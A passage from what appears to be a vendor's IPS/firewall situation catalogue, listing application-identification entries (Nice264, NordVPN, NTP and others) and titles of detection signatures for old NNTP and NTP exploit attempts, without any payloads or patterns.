Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: nGenera CIM is a global provider of next-generation software
Back to top

Nice264

About this situation: Nice264 usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-768-5211
Description: Nice264 is a video distribution platform.
Back to top

NiceLabel

About this situation: Application NiceLabel detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NiceLabel products include label design, ERP business automation, application generation, and ISV tools.
Back to top

Nicereply.com

About this situation: Application Nicereply.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Nicereply is customer service tool that allows your customers to rate and comment on emails from you. It's an email feedback and help desk tool. Nicereply provides detailed statistics on ratings from customers and also tracks overall rating change in time. The system works with all help-desk systems.
Back to top

Nickelodeon-Games

About this situation: Nickelodeon Games usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Nico-Nico-Douga

About this situation: NICO NICO DOUGA usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A popular video sharing website in Japan
Back to top

Nicoka-HR

About this situation: Application Nicoka-HR detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Nicoka is the a complete solution for manager that have outgrown using spreadsheets to manage their company information.
Back to top

Nicotto-Town

About this situation: Nicotto Town usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a Japanese social networking service that allows users to write blogs, make friends, and play games.
Back to top

Nifty-Mail

About this situation: Nifty Mail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-636-5211
Description: Nifty Mail: The services/features of this site include, web mail.
Back to top

Nimble

About this situation: Application Nimble detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Nimble is a Web Based SaaS platform that helps small businesses attract and retain customers by enabling their team to work more effectively together and stay top of mind with their prospects and customers.
Back to top

NimbleSchedule

About this situation: Application NimbleSchedule detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NimbleSchedule Employee Scheduling Software is a solution to a notorious problem.With anytime, anywhere access via the Web or smartphone, NimbleSchedule is convenient for busy people who need flexibility. By involving your team in the scheduling process, you no longer have to juggle all the requests nor seek out employees to solicit information. With less need for management intervention, you have only to glance and approve.
Back to top

Nimonik

About this situation: Application Nimonik detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Nimonik offers web and mobile solutions for environmental, health, safety and quality managers.
Back to top

Ning

About this situation: Ning usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based social networking service which allows users to connect and share information with each other online.
Back to top

Ninja-Blog

About this situation: Ninja Blog usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a Japanese blogging service that allows users to write and read content.
Back to top

NINtec

About this situation: Application NINtec detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NINtec is a software development company that offers IT infrastructure services, IT business consulting and enterprise application services to clients in automotive sector, print media and publishing sector, healthcare services, gaming, BFSI and retail verticals.
Back to top

Nintendo-Services

About this situation: Nintendo Services usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-860-5242
Last changed: sgpkg-ips-1764-5242
Description: Nintendo Services usage detected. Nintendo hosts gaming related services such as multiplayer infrastructure and content shops.
Back to top

Nirvaha

About this situation: Application Nirvaha detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Nirvaha's Quotes, Billings, and Commissions software serves to automate both quote and order creation, commission plans and payments as well as tracking for deliverables, billings, and revenue recognition.
Back to top

Nirvaha-One-Click-Commissions

About this situation: Application Nirvaha-One-Click-Commissions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OneClickCommissions - online service that generates reports and statements for sales representatives, management and payroll.
Back to top

Nirvanix

About this situation: Application Nirvanix detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Nirvanix is the provider of enterprise-class cloud storage services. It offers cloud storage solutions designed for customers with security, reliability and redundancy levels.
Back to top

Nitro

About this situation: Application Nitro detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Nitro develops commercial software used to create, edit, sign, and secure Portable Document Format
Back to top

nitrobackup

About this situation: Application nitrobackup detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Nitrobackup - online cloud based backup and storage service, providing unlimited storage.
Back to top

Nixu

About this situation: Application Nixu detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Nixu is a cybersecurity company. It improves clients cybersecurity in solution of corporate IT, digital business and industrial Internet.
Back to top

Nm-Quote

About this situation: NM Quote usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-636-5211
Description: This web CRM allows users to keep track of clients and prospects, add tasks, track communication logs, and close deals.
Back to top

NNTP

About this situation: Network News Transfer Protocol (NNTP) traffic
Context: Application Context
Severity: 1
Tags: Protocols, Discussion Forum, Application Routing
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1190-5242
Description: Network News Transfer Protocol (NNTP) usage. NNTP is a protocol used for transporting Usenet news articles.
Back to top

NNTP_Cassandra-Server-Login-Denial-Of-Service

About this situation: NNTP login Buffer Overflow
Context: TCP NNTP Client Stream
Severity: 10
Tags: Windows, x86, Atrium Software Cassandra NNTP Server, CVE2000, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: NNTP-Cassandra-Nntpserver-BOF
Description:
Back to top

NNTP_CS-Shared-Variable-Fingerprint

About this situation: This fingerprint sets shared variables
Context: TCP NNTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Client Traffic
First detected in: sgpkg-ips-1193-5242
Last changed: sgpkg-ips-1193-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

NNTP_Microsoft-Outlook-Express-And-Windows-Mail-NNTP-Handling-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Outlook Express detected
Context: TCP NNTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2007-10, CVE2007, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-437-4219
Last changed: sgpkg-ips-1193-5242
Vulnerability: Outlook-Express-And-Windows-Mail-NNTP-Handling-Code-Execution
Description:
Back to top

NNTP_MS-Windows-NNTP-Server-Buffer-Overflow

About this situation: NNTP XPAT Buffer Overflow
Context: TCP NNTP Client Stream
Severity: 10
Tags: Windows 2003, Windows NT 4.0, Windows 2000 SP0, Windows 2000 SP1, Windows 2000 SP2, Windows 2000 SP3, Windows 2000 SP4, Any Hardware, Exchange Server, MS2004-10, CVE2004, Windows 2003 not specific, Windows NT 4.0 not specific, Exchange Server not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-163-2032
Vulnerability: MS-NNTP-BOF-MS04-036
Description:
Back to top

NNTP_Outlook-Express-List-Command-Response-Buffer-Overflow

About this situation: Buffer overflow attempt against Outlook Express newsgroup client
Context: TCP NNTP Server Stream
Severity: 7
Tags: Windows, x86, Microsoft Outlook Express, MS2005-06, CVE2005, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-31-1210
Last changed: sgpkg-ips-714-5211
Vulnerability: NNTP-Outlook-Express-List-Command-Response-Buffer-Overflow
Description:
Back to top

NNTP_Suspicious-Traffic

About this situation: A suspicious traffic pattern detected
Context: TCP NNTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-560-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

No-blocked.net

About this situation: No-blocked.net usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-1215-5242
Last changed: sgpkg-ips-1215-5242
Description: No-blocked.net is a service for circumventing traffic restrictions.
Back to top

No-IP

About this situation: Application No-IP detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: c offers DNS services, email, network monitoring and SSL certificates. Email services include POP3 email, outbound SMTP email, backup mail services and mail reflection and filtering.
Back to top

Nod32-Update

About this situation: NOD32 Update usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-625-5211
Description: The update application alerts the user when online updates for NOD32 take place. Source: ESET
Back to top

Nok-Nok-Labs

About this situation: Application Nok-Nok-Labs detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Nok Nok Labs is a security platform providing online authentication solutions for organizations.
Back to top

Nokia-Here

About this situation: Nokia HERE usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Orienteering, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: HERE formerly known as Ovi Maps and Nokia Maps, Nokias mapping and location assets under one brand. The technology of Here is based on a cloud-computing model, in which location data and services are stored on remote servers so that users have access to it regardless of which device they use. Here captures location content such as road networks, buildings, parks and traffic patterns.
Back to top

Nokia-Ovi-Store

About this situation: Nokia Ovi Store usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Users can download mobile games, applications, videos, images, and ringing tones to their Nokia devices.Source: Wikipedia
Back to top

NolaPro

About this situation: Application NolaPro detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NolaPro is a web-based accounting application running under MySQL and PHP. Provides Accounting Software featuring core Accounts Payable, Accounts Receivable, General Ledger, Inventory, E-commerce, PoS, Orders, Payroll, Timeclock.
Back to top

NoMachine

About this situation: NoMachine usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Remote control
First detected in: sgpkg-ips-648-5211
Last changed: sgpkg-ips-939-5242
Description: NoMachine is a remote access application that supports various operating systems, including Linux, Solaris, OSX and Windows. The application uses NX protocol for communication.
Back to top

Nomadesk

About this situation: Nomadesk usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: Nomadesk is an easy and secure way to collaborate on and backup critical files from any location. Alleviate the hassles and high costs of traditional document management solutions with Nomadesk.
Back to top

Nominet-UK

About this situation: Application Nominet-UK detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Nominet, the official register of .uk domain names.
Back to top

Non-Traditional Religions

About this situation: Sites that provide information about non-traditional religious beliefs and practices.
Context: URL Application Context
Severity: 1
Tags: Religion, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about non-traditional religious beliefs and practices.
Back to top

Noodle

About this situation: Application Noodle detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Noodle is an social intranet software that provides companies the ability to share ideas, post documents, merge schedules, upload photos and collaborate on projects.
Back to top

NoodleTools

About this situation: Application NoodleTools detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NoodleTools
Back to top

Noon VPN

About this situation: Noon VPN usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies
First detected in: sgpkg-ips-1380-5242
Last changed: sgpkg-ips-1380-5242
Description: Noon VPN can be used to bypass network restrictions.
Back to top

Noona-Healthcare

About this situation: Noona-Healthcare usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Health, Application Routing
First detected in: sgpkg-ips-773-5211
Last changed: sgpkg-ips-1238-5242
Description: Noona Healthcare is a Finnish medical information technology service provider. Their products include tools to assist cancer research and communication between cancer patients and clinics.
Back to top

nopCommerce

About this situation: Application nopCommerce detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: nopCommerce is an ASP.net open-source eCommerce suite to lower TCO and increase ROI.
Back to top

Norcom

About this situation: Application Norcom detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NorCom is provide IT-consulting and software product development. NCPower, one of the main products of NorCom, has been developed for TV- and radio broadcasting companies to enhance the workflow management of media content. The companies using the NCPower system in Germany include the RTL-Group and the news broadcaster N24 of ProSiebenSat.1 Media.
Back to top

Nordea

About this situation: Nordea usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-1764-5242
Description: Nordea usage detected. Nordea is a Nordic bank corporation.
Back to top

Nordisk-e-handel

About this situation: Application Nordisk-e-handel detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Nordiskehandel e-commerce platform is a so-called hyrlosning, where the license, operation, start training, support, updates and service provided for a fixed cost.
Back to top

Nordnet

About this situation: Nordnet usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-1764-5242
Description: Nordnet usage detected. Nordnet is a Nordic stock trading platform.
Back to top

NordSafety

About this situation: Application NordSafety detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NordSafety provides mobile solution for work safety make and helps to manage site information.
Back to top

Nordstrom-Credit-Services

About this situation: Application Nordstrom-Credit-Services detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Nordstrom Credit Services is a bank credit service that provides online account access.
Back to top

NordVPN

About this situation: NordVPN usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-1547-5242
Last changed: sgpkg-ips-1873-5242
Description: NordVPN is a VPN service that can be used on multiple devices.
Back to top

Norma4

About this situation: Application Norma4 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Norma 4 is a venture expert Spanish Information Technologies.
Back to top

Norman-Business

About this situation: Application Norman-Business detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Norman Safeground - antivirus and Internet Security Software
Back to top

Nortek-People-Management-Software

About this situation: Application Nortek-People-Management-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Nortek People Management Software is a collection of Cloud-based HR, Timekeeping Payroll products that work together to help your business adapt and thrive.
Back to top

North-Plains-DAM

About this situation: Application North-Plains-DAM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Digital Asset Management
Back to top

Northdoor

About this situation: Application Northdoor detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Northdoor is an IT consultancy and solutions provider. Northdoor provide specialist skills across IT Consultancy, Enterprise Infrastructure, and IT Support and Managed Services into one integrated solution for our clients.
Back to top

Northgate-is

About this situation: Application Northgate-is detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Northgate Information Solutions Limited
Back to top

NorthgateArinso

About this situation: Application NorthgateArinso detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NGA Human Resources helps organizations to transform their business-critical HR operations to deliver more effective and efficient people-critical services.
Back to top

NorthStar-Solutions

About this situation: Application NorthStar-Solutions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NorthStar Solutions is an e-commerce provider for business that helps to sell products.
Back to top

Norton-Online-Backup

About this situation: Norton Online Backup usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1764-5242
Description: Norton Online Backup lets user quickly and easily recover your files in case of hard drive crashes, accidental deletion, theft of your computer, natural disasters or other mishaps. It provides automatically backs up your photos and important files to secured online data centers. Source: Wikipedia
Back to top

Norton-Zone

About this situation: Norton Zone usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This service provides users with a dedicated file storage and backup.
Back to top

NOS.nl

About this situation: NOS.nl usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-707-5211
Last changed: sgpkg-ips-707-5211
Description: NOS is the Dutch public broadcaster
Back to top

Notable

About this situation: Notable usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1764-5242
Description: Notable allows people to capture the visual, code, and copy portions of any website, annotate these captures, and share them with their team and collaborators.
Back to top

Notepad++ Updater

About this situation: Endpoint Context Agent based Notepad++ Updater detection
Context: EI Correlation
Severity: 1
Tags: Software / System Updates, Endpoint
First detected in: sgpkg-ips-1074-5242
Last changed: sgpkg-ips-1074-5242
Description: A network connection launched by the Notepad++ Updater was detected.
Back to top

Noteworthy

About this situation: noteworthy usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: a family-owned manufacturer of promotional products.
Back to top

NovaBACKUP

About this situation: Application NovaBACKUP detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NovaStor's cost-effective solutions are platform- and hardware-independent and ensure that optimal technological and economical use is gained from the customer's existing and future IT environment.
Back to top

Novatus

About this situation: Application Novatus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Novatus provides cloud-based contract management software that helps manage, negotiate, and administer contractual agreements with customers, partners andsuppliers.
Back to top

Novi-Survey

About this situation: Application Novi-Survey detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Novi Survey is an advanced survey software for online surveys, web surveys, and email surveys.
Back to top

Novus

About this situation: Application Novus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Novus portfolio analytics platform helps institutional investors better manage and analyze their risk, performance and exposures to generate higher returns.
Back to top

Now-Assistant

About this situation: Application Now-Assistant detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Now Assistant is an AI-powered Digital Assistant that understands your commands and proactively sends you Cards about relevant updates.
Back to top

Now-We-Comply

About this situation: Application Now-We-Comply detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Now We Comply is a cloud-based compliance audit workflow management software.
Back to top

Nozbe

About this situation: Application Nozbe detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Nozbe is a tool that helps busy professionals and teams organize time and projects.
Back to top

NSFOCUS

About this situation: Application NSFOCUS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NSFOCUS provides enterprise-level network security solutions. It offers analysis, threat understanding and security intelligence, providing technical support, solutions and services.
Back to top

Nslookup

About this situation: Endpoint Context Agent based nslookup detection
Context: EI Correlation
Severity: 1
Tags: Non-Essential System Services, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: A network connection launched by the Windows command line tool nslookup was detected. Nslookup can be used for querying the Domain Name System (DNS).
Back to top

NTLM ID Support User-Agent

About this situation: User-Agent which supports NTML ID detected
Context: Application Context
Severity: 1
Tags: Protocols, System Internal Applications
First detected in: sgpkg-ips-1654-5242
Last changed: sgpkg-ips-1654-5242
Description: This application allows redirecting NTLM ID capable User-Agents in the access policy.
Back to top

NTLM IWA Support User-Agent

About this situation: User-Agent which supports NTML IWA detected
Context: Application Context
Severity: 1
Tags: Protocols, System Internal Applications
First detected in: sgpkg-ips-1632-5242
Last changed: sgpkg-ips-1632-5242
Description: This application allows redirecting NTLM IWA capable User-Agents in the access policy.
Back to top

NTP

About this situation: NTP traffic detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-562-5211
Last changed: sgpkg-ips-1586-5242
Description: NTP is used to synchronize time between machines.
Back to top

NTP_UDP-Multiple-Vendors-Ntp-Mode-7-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in NTP.org NTP detected
Context: UDP NTP Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Unified CallManager, Cisco Systems Unified Communications Manager, CVE2009, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Multiple-Vendors-Ntp-Mode-7-Denial-Of-Service
Description:
Back to top

NTP_UDP-Network-Time-Protocol-Daemon-Configure-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in ntp.org NTP detected
Context: UDP NTP Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ntpd, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-625-5211
Vulnerability: Network-Time-Protocol-Daemon-Configure-Buffer-Overflow
Description:
Back to top

NTP_UDP-Network-Time-Protocol-Daemon-Control_putdata-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in ntp.org NTP detected
Context: UDP NTP Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ntpd, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-640-5211
Vulnerability: Network-Time-Protocol-Daemon-Control_putdata-Buffer-Overflow
Description:
Back to top

NTP_UDP-Network-Time-Protocol-Daemon-Crypto-nak-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in NTP detected
Context: UDP NTP Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ntpd, CVE2015, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-1618-5242
Vulnerability: Network-Time-Protocol-Daemon-Crypto-nak-Authentication-Bypass
Network-Time-Protocol-Daemon-Crypto-nak-Denial-Of-Service
Description:
Back to top

NTP_UDP-Network-Time-Protocol-Daemon-Decodenetnum-Assertion-Failure

About this situation: An attempt to exploit a vulnerability in ntp.org NTP detected
Context: UDP NTP Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ntpd, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-700-5211
Last changed: sgpkg-ips-700-5211
Vulnerability: Network-Time-Protocol-Daemon-Decodenetnum-Assertion-Failure
Description:
Back to top

NTP_UDP-Network-Time-Protocol-Daemon-Peer_xmit-Mode-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ntp.org NTP detected
Context: UDP NTP Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ntpd, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-869-5242
Last changed: sgpkg-ips-869-5242
Vulnerability: Network-Time-Protocol-Daemon-Peer_xmit-Mode-Denial-Of-Service
Description:
Back to top

NTP_UDP-Network-Time-Protocol-Daemon-Pidfile-Driftfile-Arbitrary-File-Overwrite

About this situation: An attempt to exploit a vulnerability in ntp.org NTP detected
Context: UDP NTP Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ntpd, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-704-5211
Vulnerability: Network-Time-Protocol-Daemon-Pidfile-Driftfile-Arbitrary-File-Overwrite
Description:
Back to top

NTP_UDP-Network-Time-Protocol-Daemon-Read_Mru_List-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ntp.org NTP detected
Context: UDP NTP Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ntpd, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-825-5242
Last changed: sgpkg-ips-825-5242
Vulnerability: Network-Time-Protocol-Daemon-Read_Mru_List-Denial-Of-Service
Description:
Back to top

NTP_UDP-Network-Time-Protocol-Ntpq-Decodearr-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in ntp.org NTP detected
Context: UDP NTP Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ntpd, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1121-5242
Last changed: sgpkg-ips-1375-5242
Vulnerability: Network-Time-Protocol-Ntpq-Decodearr-Stack-Based-Buffer-Overflow
Description:
Back to top

NTP_UDP-Ntp-Daemon-Autokey-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in the Network Time Protocol daemon detected
Context: UDP NTP Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ntpd, CVE2009, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-356-4219
Last changed: sgpkg-ips-356-4219
